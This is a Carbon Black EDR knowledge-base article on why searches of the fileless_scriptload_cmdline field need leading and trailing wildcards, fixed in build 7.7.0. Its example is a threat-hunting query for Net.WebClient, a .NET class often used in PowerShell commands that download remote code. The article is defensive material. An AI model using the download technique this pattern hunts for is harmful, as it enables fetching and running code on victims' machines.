EDR: Fileless_Scriptload_Cmdline Searches not Working as Expected
book
Article ID: 288273
calendar_today
Updated On:
Products
Carbon Black EDR (formerly Cb Response)
Issue/Introduction
Example:
The following query does not return any results
fileless_scriptload_cmdline:Net.WebClient
To get the results the following will work
fileless_scriptload_cmdline:*Net.WebClient*
NOTE:
For the successful query to work disable the feature "Block Searches with Leading Wildcards" in settings->Advanced Settings
Cause
fileless_scriptload_cmdline field is not Tokenized
Resolution
This issue is resolved with EDR Server build 7.7.0
Feedback
thumb_up
Yes
thumb_down
No